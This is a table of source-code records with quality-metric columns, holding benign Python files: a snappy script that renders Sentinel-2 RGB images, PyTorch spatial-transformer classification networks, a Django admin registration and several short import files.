hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
740cd479d103bcb29d6d4137d552bd2d9ce84e8c | 10,005 | py | Python | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | 1 | 2016-12-04T18:01:49.000Z | 2016-12-04T18:01:49.000Z | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | 13 | 2017-03-16T15:44:21.000Z | 2019-08-19T16:56:04.000Z | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | null | null | null | # from snappy import Product
# from snappy import ProductData
# import snappy
#
# import numpy
# import sys
# from snappy import String
def plot_RGB(basedir):
from snappy import ProductIO
from snappy import ProductUtils
from snappy import ProgressMonitor
from snappy import jpy
from os.path import join
from tempfile import mkstemp
mtd = 'MTD_MSIL1C.xml'
_, rgb_image = mkstemp(dir='.', prefix= 'RGB', suffix='.png')
source = join(basedir, mtd)
sourceProduct = ProductIO.readProduct(source)
b2 = sourceProduct.getBand('B2')
b3 = sourceProduct.getBand('B3')
b4 = sourceProduct.getBand('B4')
Color = jpy.get_type('java.awt.Color')
ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
JAI = jpy.get_type('javax.media.jai.JAI')
RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
# Disable JAI native MediaLib extensions
System = jpy.get_type('java.lang.System')
System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
#
legend = ImageLegend(b2.getImageInfo(), b2)
legend.setHeaderText(b2.getName())
# red = product.getBand('B4')
# green = product.getBand('B3')
# blue = product.getBand('B2')
image_info = ProductUtils.createImageInfo([b4, b3, b2], True, ProgressMonitor.NULL)
im = ImageManager.getInstance().createColoredBandImage([b4, b3, b2], image_info, 0)
JAI.create("filestore", im, rgb_image, 'PNG')
return rgb_image
basedir = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/'
plot_RGB(basedir)
#
# source = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/MTD_MSIL1C.xml'
# sourceProduct = ProductIO.readProduct(source)
# sourceProduct.getBandNames()
#
# b2 = sourceProduct.getBand('B2')
# b3 = sourceProduct.getBand('B3')
# b4 = sourceProduct.getBand('B4')
# #
# jpy = snappy.jpy
#
# # More Java type definitions required for image generation
# Color = jpy.get_type('java.awt.Color')
# ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
# ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
# ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
# ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
# ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
# JAI = jpy.get_type('javax.media.jai.JAI')
# RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
#
# # Disable JAI native MediaLib extensions
# System = jpy.get_type('java.lang.System')
# System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
#
# def write_image(band, filename, format):
# im = ImageManager.getInstance().createColoredBandImage([band], band.getImageInfo(), 0)
# JAI.create("filestore", im, filename, format)
#
# def write_rgb_image(bands, filename, format):
# image_info = ProductUtils.createImageInfo(bands, True, ProgressMonitor.NULL)
# im = ImageManager.getInstance().createColoredBandImage(bands, image_info, 0)
# JAI.create("filestore", im, filename, format)
#
# # points = [ColorPoint(0.0, Color.YELLOW),
# # ColorPoint(50.0, Color.RED),
# # ColorPoint(100.0, Color.BLUE)]
# # cpd = ColorPaletteDef(points)
# # ii = ImageInfo(cpd)
# # b2.setImageInfo(ii)
# #
# image_format = 'PNG'
#
# # write_image(b2, 'snappy_image.png', image_format)
# # legend_image = legend.createImage()
# #
# # # This cast is need because otherwise jpy can't evaluate which method to call
# # # This is considered as an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# # rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# # JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
# #
# legend = ImageLegend(b2.getImageInfo(), b2)
# legend.setHeaderText(b2.getName())
#
# # red = product.getBand('B4')
# # green = product.getBand('B3')
# # blue = product.getBand('B2')
#
# write_rgb_image([b4, b3, b2], 'snappy_write_image_rgb.png', image_format)
# #
# # #legend.setOrientation(ImageLegend.HORIZONTAL) # or ImageLegend.VERTICAL
# #legend.setFont(legend.getFont().deriveFont(14))
# #legend.setBackgroundColor(Color.CYAN)
# #legend.setForegroundColor(Color.ORANGE);
# #legend.setBackgroundTransparency(0.7);
# #legend.setBackgroundTransparencyEnabled(True);
# #legend.setAntialiasing(True);
#
# legend_image = legend.createImage()
#
# # This cast is need because otherwise jpy can't evaluate which method to call
# # This is considered as an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = product.getBand('B4')
# green = product.getBand('B3')
# blue = product.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# # This cast is need because otherwise jpy can't evaluate which method to call
# # This is considered as an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = sourceProduct.getBand('B4')
# green = sourceProduct.getBand('B3')
# blue = sourceProduct.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# # This cast is need because otherwise jpy can't evaluate which method to call
# # This is considered as an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = sourceProduct.getBand('B4')
# green = sourceProduct.getBand('B3')
# blue = sourceProduct.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# import snappy
# import sys
# from snappy import (ProductIO, ProductUtils, ProgressMonitor)
#
# # if len(sys.argv) != 2:
# # print("usage: %s <file>" % sys.argv[0])
# # sys.exit(1)
# #
# # file = sys.argv[1]
#
#
# # import rasterio
# # import numpy as np
# from os import path, listdir
# # from tempfile import mkstemp
# # from osgeo import gdal
# # # import os, rasterio
# import glob
# # import subprocess
#
# basedir = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/'
#
# prefix = path.basename(path.normpath(basedir)).split('.')[0]
#
# jps = []
# fname = basedir.split('/')[-1]
# ID = fname.replace('.SAVE','')
#
# for filename in glob.glob(basedir + '/GRANULE/*/IMG_DATA/*jp2'):
# jps.append(filename)
#
# jp_B04 = [jp for jp in jps if '_B04.jp2' in jp][0]
# jp_B08 = [jp for jp in jps if '_B08.jp2' in jp][0]
#
#
#
# jpy = snappy.jpy
#
# # More Java type definitions required for image generation
# Color = jpy.get_type('java.awt.Color')
# ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
# ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
# ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
# ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
# ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
# JAI = jpy.get_type('javax.media.jai.JAI')
# RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
#
#
# # Disable JAI native MediaLib extensions
# System = jpy.get_type('java.lang.System')
# System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
#
# def write_image(band, filename, format):
# im = ImageManager.getInstance().createColoredBandImage([band], band.getImageInfo(), 0)
# JAI.create("filestore", im, filename, format)
#
# def write_rgb_image(bands, filename, format):
# image_info = ProductUtils.createImageInfo(bands, True, ProgressMonitor.NULL)
# im = ImageManager.getInstance().createColoredBandImage(bands, image_info, 0)
# JAI.create("filestore", im, filename, format)
#
# product = ProductIO.readProduct(file)
# band = product.getBand('radiance_13')
#
# # The colour palette assigned to pixel values 0, 50, 100 in the band's geophysical units
# points = [ColorPoint(0.0, Color.YELLOW),
# ColorPoint(50.0, Color.RED),
# ColorPoint(100.0, Color.BLUE)]
# cpd = ColorPaletteDef(points)
# ii = ImageInfo(cpd)
# band.setImageInfo(ii)
#
# image_format = 'PNG'
# write_image(band, 'snappy_image.png', image_format)
#
# legend = ImageLegend(band.getImageInfo(), band)
# legend.setHeaderText(band.getName())
#
# #legend.setOrientation(ImageLegend.HORIZONTAL) # or ImageLegend.VERTICAL
# #legend.setFont(legend.getFont().deriveFont(14))
# #legend.setBackgroundColor(Color.CYAN)
# #legend.setForegroundColor(Color.ORANGE);
# #legend.setBackgroundTransparency(0.7);
# #legend.setBackgroundTransparencyEnabled(True);
# #legend.setAntialiasing(True);
#
# legend_image = legend.createImage()
#
# # This cast is need because otherwise jpy can't evaluate which method to call
# # This is considered as an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = product.getBand('radiance_13')
# green = product.getBand('radiance_5')
# blue = product.getBand('radiance_1')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
| 38.187023 | 165 | 0.730135 | 1,291 | 10,005 | 5.534469 | 0.158792 | 0.022673 | 0.037789 | 0.027292 | 0.83177 | 0.823233 | 0.811477 | 0.782225 | 0.782225 | 0.782225 | 0 | 0.026781 | 0.122939 | 10,005 | 261 | 166 | 38.333333 | 0.787464 | 0.781909 | 0 | 0 | 0 | 0.03125 | 0.260094 | 0.211327 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.1875 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
742287123f9913486498681afacff27ae771606f | 172 | py | Python | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | with open("file2.txt", "r") as TextIO:
print("The TextIO is at byte :", TextIO.tell())
TextIO.seek(10)
print("After reading, the TextIO is at:", TextIO.tell())
| 34.4 | 60 | 0.633721 | 27 | 172 | 4.037037 | 0.62963 | 0.165138 | 0.201835 | 0.238532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021429 | 0.186047 | 172 | 4 | 61 | 43 | 0.757143 | 0 | 0 | 0 | 0 | 0 | 0.377907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
74323849c3f35de92af8dc2c05f55298519ad52b | 4,861 | py | Python | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 201 | 2018-03-01T01:06:49.000Z | 2022-03-08T07:57:19.000Z | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 11 | 2018-03-15T17:06:52.000Z | 2020-05-18T16:40:15.000Z | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 48 | 2018-03-06T21:12:34.000Z | 2021-11-30T04:15:35.000Z | import numpy as np
import torch
import time
import data,warp,util
# build classification network
class FullCNN(torch.nn.Module):
def __init__(self,opt):
super(FullCNN,self).__init__()
self.inDim = 1
def conv2Layer(outDim):
conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[3,3],stride=1,padding=0)
self.inDim = outDim
return conv
def linearLayer(outDim):
fc = torch.nn.Linear(self.inDim,outDim)
self.inDim = outDim
return fc
def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
self.conv2Layers = torch.nn.Sequential(
conv2Layer(3),torch.nn.ReLU(True),
conv2Layer(6),torch.nn.ReLU(True),maxpoolLayer(),
conv2Layer(9),torch.nn.ReLU(True),
conv2Layer(12),torch.nn.ReLU(True)
)
self.inDim *= 8**2
self.linearLayers = torch.nn.Sequential(
linearLayer(48),torch.nn.ReLU(True),
linearLayer(opt.labelN)
)
initialize(opt,self,opt.stdC)
def forward(self,opt,image):
feat = image
feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
feat = self.linearLayers(feat)
output = feat
return output
# build classification network
class CNN(torch.nn.Module):
def __init__(self,opt):
super(CNN,self).__init__()
self.inDim = 1
def conv2Layer(outDim):
conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[9,9],stride=1,padding=0)
self.inDim = outDim
return conv
def linearLayer(outDim):
fc = torch.nn.Linear(self.inDim,outDim)
self.inDim = outDim
return fc
def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
self.conv2Layers = torch.nn.Sequential(
conv2Layer(3),torch.nn.ReLU(True)
)
self.inDim *= 20**2
self.linearLayers = torch.nn.Sequential(
linearLayer(opt.labelN)
)
initialize(opt,self,opt.stdC)
def forward(self,opt,image):
feat = image
feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
feat = self.linearLayers(feat)
output = feat
return output
# an identity class to skip geometric predictors
class Identity(torch.nn.Module):
def __init__(self): super(Identity,self).__init__()
def forward(self,opt,feat): return [feat]
# build Spatial Transformer Network
class STN(torch.nn.Module):
def __init__(self,opt):
super(STN,self).__init__()
self.inDim = 1
def conv2Layer(outDim):
conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[7,7],stride=1,padding=0)
self.inDim = outDim
return conv
def linearLayer(outDim):
fc = torch.nn.Linear(self.inDim,outDim)
self.inDim = outDim
return fc
def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
self.conv2Layers = torch.nn.Sequential(
conv2Layer(4),torch.nn.ReLU(True),
conv2Layer(8),torch.nn.ReLU(True),maxpoolLayer()
)
self.inDim *= 8**2
self.linearLayers = torch.nn.Sequential(
linearLayer(48),torch.nn.ReLU(True),
linearLayer(opt.warpDim)
)
initialize(opt,self,opt.stdGP,last0=True)
def forward(self,opt,image):
imageWarpAll = [image]
feat = image
feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
feat = self.linearLayers(feat)
p = feat
pMtrx = warp.vec2mtrx(opt,p)
imageWarp = warp.transformImage(opt,image,pMtrx)
imageWarpAll.append(imageWarp)
return imageWarpAll
# build Inverse Compositional STN
class ICSTN(torch.nn.Module):
def __init__(self,opt):
super(ICSTN,self).__init__()
self.inDim = 1
def conv2Layer(outDim):
conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[7,7],stride=1,padding=0)
self.inDim = outDim
return conv
def linearLayer(outDim):
fc = torch.nn.Linear(self.inDim,outDim)
self.inDim = outDim
return fc
def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
self.conv2Layers = torch.nn.Sequential(
conv2Layer(4),torch.nn.ReLU(True),
conv2Layer(8),torch.nn.ReLU(True),maxpoolLayer()
)
self.inDim *= 8**2
self.linearLayers = torch.nn.Sequential(
linearLayer(48),torch.nn.ReLU(True),
linearLayer(opt.warpDim)
)
initialize(opt,self,opt.stdGP,last0=True)
def forward(self,opt,image,p):
imageWarpAll = []
for l in range(opt.warpN):
pMtrx = warp.vec2mtrx(opt,p)
imageWarp = warp.transformImage(opt,image,pMtrx)
imageWarpAll.append(imageWarp)
feat = imageWarp
feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
feat = self.linearLayers(feat)
dp = feat
p = warp.compose(opt,p,dp)
pMtrx = warp.vec2mtrx(opt,p)
imageWarp = warp.transformImage(opt,image,pMtrx)
imageWarpAll.append(imageWarp)
return imageWarpAll
# initialize weights/biases
def initialize(opt,model,stddev,last0=False):
for m in model.conv2Layers:
if isinstance(m,torch.nn.Conv2d):
m.weight.data.normal_(0,stddev)
m.bias.data.normal_(0,stddev)
for m in model.linearLayers:
if isinstance(m,torch.nn.Linear):
if last0 and m is model.linearLayers[-1]:
m.weight.data.zero_()
m.bias.data.zero_()
else:
m.weight.data.normal_(0,stddev)
m.bias.data.normal_(0,stddev)
| 30.006173 | 81 | 0.714873 | 698 | 4,861 | 4.906877 | 0.153295 | 0.079708 | 0.070073 | 0.052555 | 0.821606 | 0.791825 | 0.77781 | 0.767883 | 0.730511 | 0.730511 | 0 | 0.024976 | 0.143386 | 4,861 | 161 | 82 | 30.192547 | 0.79755 | 0.040321 | 0 | 0.677852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154362 | false | 0 | 0.026846 | 0.033557 | 0.295302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7455cca9f57192cfcea3b1d7f6e362fbb0028afd | 39 | py | Python | dlocr/ctpn/lib/__init__.py | HandsomeBrotherShuaiLi/ChineseCalligraphyDetection | 19c80ac6be272f8cf2552c9281548554c063d5c7 | [
"Apache-2.0"
] | 277 | 2018-11-14T06:15:34.000Z | 2022-02-05T15:20:40.000Z | dlocr/ctpn/lib/__init__.py | dun933/text-detection-ocr | 9bb9efd4a0a7af7d1a9a6784450d1843ffe15d8a | [
"Apache-2.0"
] | 31 | 2018-11-19T09:47:05.000Z | 2021-05-18T16:36:42.000Z | dlocr/ctpn/lib/__init__.py | dun933/text-detection-ocr | 9bb9efd4a0a7af7d1a9a6784450d1843ffe15d8a | [
"Apache-2.0"
] | 116 | 2018-11-14T06:15:37.000Z | 2022-03-17T09:09:42.000Z | from dlocr.ctpn.lib.other import Graph
| 19.5 | 38 | 0.820513 | 7 | 39 | 4.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74a560a8dde48041b01976f0b15d374c44e9da9a | 40 | py | Python | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 13 | 2020-08-13T12:54:17.000Z | 2021-12-28T10:48:50.000Z | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 43 | 2020-08-11T02:00:59.000Z | 2021-02-15T17:09:19.000Z | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 24 | 2020-08-17T20:09:54.000Z | 2022-03-23T23:50:44.000Z | from .permissions import has_permission
| 20 | 39 | 0.875 | 5 | 40 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74aad272eff97079307b2fb097515d98075a5e3e | 242 | py | Python | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | null | null | null | from django.contrib import admin
from annotation import models
admin.site.register(models.AnnotationRun)
admin.site.register(models.AnnotationVersion)
admin.site.register(models.ClinVar)
admin.site.register(models.VariantAnnotationVersion)
| 26.888889 | 52 | 0.855372 | 29 | 242 | 7.137931 | 0.448276 | 0.173913 | 0.328502 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057851 | 242 | 8 | 53 | 30.25 | 0.907895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
7792c2174051f896a88a670e242289e198545f95 | 43 | py | Python | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
] | 47 | 2020-09-11T01:40:37.000Z | 2022-03-29T02:41:17.000Z | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
] | 41 | 2020-09-11T01:33:13.000Z | 2022-03-22T11:21:53.000Z | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
] | 24 | 2020-09-22T08:23:38.000Z | 2022-03-19T11:14:10.000Z | from .multisig_wallet import MultiSigWallet | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
77acb871c8f24af104734e6229991cfa71c7845b | 14,890 | py | Python | models/sseg/base.py | GIShkl/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
